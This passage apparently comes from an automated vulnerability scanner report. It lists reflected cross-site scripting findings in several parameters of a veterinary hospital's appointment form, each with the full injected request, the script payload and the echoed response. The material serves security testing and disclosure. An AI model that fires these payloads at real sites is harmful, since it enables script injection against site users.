GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=7a872"><script>alert(1)</script>e5865d0001d&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3iaem1hmp6hv9mq27eu3sdqt14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="other" id="other" type="text" size="40" class="req" maxlength="255" value="7a872"><script>alert(1)</script>e5865d0001d" />
...[SNIP]...

2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5494"><script>alert(1)</script>954e538de19 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=f5494"><script>alert(1)</script>954e538de19&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rck5nv710n6smmo8j1o5au3gj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="petage" id="petage" type="text" size="15" maxlength="50" value="f5494"><script>alert(1)</script>954e538de19" />
...[SNIP]...

2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a9"><script>alert(1)</script>48aa8f098b1 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=f62a9"><script>alert(1)</script>48aa8f098b1&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=d24coc2ad0oa7sgdfpbfikjlv2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="petname" id="petname" type="text" size="20" maxlength="50" value="f62a9"><script>alert(1)</script>48aa8f098b1" />
...[SNIP]...

2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f7f"><script>alert(1)</script>e984da2d97e was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=dqg12p4d53qnj55akadef34au0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
al/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-vet
...[SNIP]...

2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23b"><script>alert(1)</script>c192c8c7378 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=8d23b"><script>alert(1)</script>c192c8c7378&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:49 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ulacnh0hcc7s695g9fao52rn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="phone" id="phone" type="text" size="30" maxlength="20" value="8d23b"><script>alert(1)</script>c192c8c7378" />
...[SNIP]...

2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the reason request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c7e"><script>alert(1)</script>90a0eb32c87 was submitted in the reason parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2fopkg0805iekeqe17d0m8pkk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
tphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospita
...[SNIP]...

2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60be4"><script>alert(1)</script>496b4f91b44 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kj92hmpgpn5u0e6c6lisgdjpj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
